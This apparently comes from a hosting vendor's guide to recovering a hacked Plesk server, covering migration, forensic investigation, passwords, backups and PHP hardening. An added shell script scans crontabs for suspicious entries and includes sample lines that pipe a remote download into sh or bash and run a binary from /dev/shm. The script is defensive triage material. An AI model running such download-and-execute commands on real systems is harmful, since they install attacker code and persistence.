Help – My Plesk server was hacked!
Servers are at the core of business operations: they store data and manage mail, contacts, apps, files and more. They are important but not impenetrable, and can fall victim to hackers. A hacked server is no longer under your control, and this spells trouble on many levels. So what should you do if your Plesk server is hacked? Follow this guide and find out.
Consequences of Server Hacking
A hack leaves you with a server that is partially controlled by someone else, who intends to use it for their own purposes. They may send out spam to the contacts you have saved on your server, or launch attacks against other servers and attempt to gain access to highly sensitive information.
The ramifications of a hacked server can be quite disastrous for businesses, because they can easily lose access to their company and client data, disrupting operations. Moreover, a hacked server might lead to a loss of trust and confidence among clients and investors. The good news is that, while your Plesk server can potentially become a hacking victim, there are steps you can take if this happens.
Identifying the way your server was hacked
Migrating to a new server is an important first step, but users also need to be aware of how the first attack happened, so that they can mitigate future attacks. Third-party solutions that search for rootkits or malware scan for known malware, so they can sometimes miss threats they have never detected before. When that happens, the report is inaccurate.
The first rule is not to make any changes on the server before an investigation starts, because this helps you avoid losing traces and evidence. We therefore recommend that you contact a security company which specializes in cases of server hacking. They can lend their expertise on the matter and help you resolve the situation faster.
What to do if your server has been hacked
In case of hacking, we always recommend migrating all the contents of your existing server to a new one. The main reason is that the attacker would have raised their privileges on your server to the root level. They can do this using malicious software, which grants them access to basically anything they want.
You may even hire someone to find rootkits or malware during the investigation and subsequently clean up. However, there's no guarantee that nothing else is left behind. Malware can be loaded into RAM, backdoors may have been enabled, and cron jobs can contain a task that downloads malicious software.
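Added example (not part of the original article and not Plesk tooling): a read-only shell function that lists cron entries matching three patterns an investigator would want to look at, namely a download piped to a shell, a base64 decode, and a path under a temp directory. The patterns, the function names and the sample crontab are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: read-only cron triage. It only reads files and prints leads
# for an investigator; the three patterns are illustrative assumptions, not a
# complete signature set, and a match is not proof of compromise.

# scan_cron PATH...  prints "file:line:[reason] entry" for suspicious entries.
# If an entry matches several patterns, the last matching reason is shown.
scan_cron() {
    for target in "$@"; do
        [ -e "$target" ] || continue
        find "$target" -type f -exec awk '
            /^[ \t]*#/ || /^[ \t]*$/ { next }   # skip comments and blank lines
            /(curl|wget)[^|;&]*[|][ \t]*(ba|da|z)?sh/ { why = "download piped to shell" }
            /base64[ \t]+(-d|--decode)/               { why = "base64 decode" }
            /(\/tmp|\/var\/tmp|\/dev\/shm)\//         { why = "path in temp dir" }
            why != "" { printf "%s:%d:[%s] %s\n", FILENAME, FNR, why, $0; why = "" }
        ' {} +
    done
}

# make_sample FILE  writes a constructed crontab (documentation IP range).
make_sample() {
    cat > "$1" <<'EOF'
# constructed sample, not taken from a real server
0 3 * * * root /usr/bin/certbot renew -q
*/5 * * * * www-data curl -fsSL http://203.0.113.10/u.sh | sh
#*/5 * * * * root wget -qO- http://203.0.113.10/x | bash
@reboot root /dev/shm/.cache/kworker
EOF
}

# Demo on the constructed sample. On a real host, run as root:
#   scan_cron /etc/crontab /etc/cron.d /var/spool/cron
demo=$(mktemp -d) && make_sample "$demo/sample" && scan_cron "$demo"
rm -rf "$demo"
```

A clean result only rules out this one persistence method, which is why migrating is still the recommendation. To keep evidence intact, run it against a read-only mount of a disk image rather than the live system.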
Some users may argue that you can restore the server to a point in time before the attack. But we think that this doesn't really guarantee a clean server, since it was compromised to begin with: the malware may already have been uploaded to the server, or may be lying dormant somewhere, ready to become active. Therefore, a clean slate is the best possible course of action in order to eliminate any doubts about future attacks.
Preventing future attacks
If you do contact a security company, they can give you a comprehensive list of things you can do to prevent future attacks and ensure that you have a secure Plesk server.
One of the most common solutions is using stronger passwords. These obviously give better protection for your administration accounts. If you’re unsure about how to create strong passwords, you can find several free online tools that measure password strength.
Also, we recommend that you change the passwords for key access points at regular intervals, every three months for example, in order to add an extra layer of security.
Maintaining regular backups of your data on a scheduled basis is another important step. If a domain becomes compromised, it can go unnoticed for some time. So backing up data allows you to restore your service from a clean backup.
Finally, we advise you to strengthen your PHP settings, because this will greatly increase the security of your service.
Businesses heavily depend on computers to maintain their operations. And yet, most of these companies never fully prepare for when something affects their servers. So, these are just a few simple changes you can make in order to reduce the possibility of an attack from a malicious third party. Start preventing possible damage to your business, profits and reputation.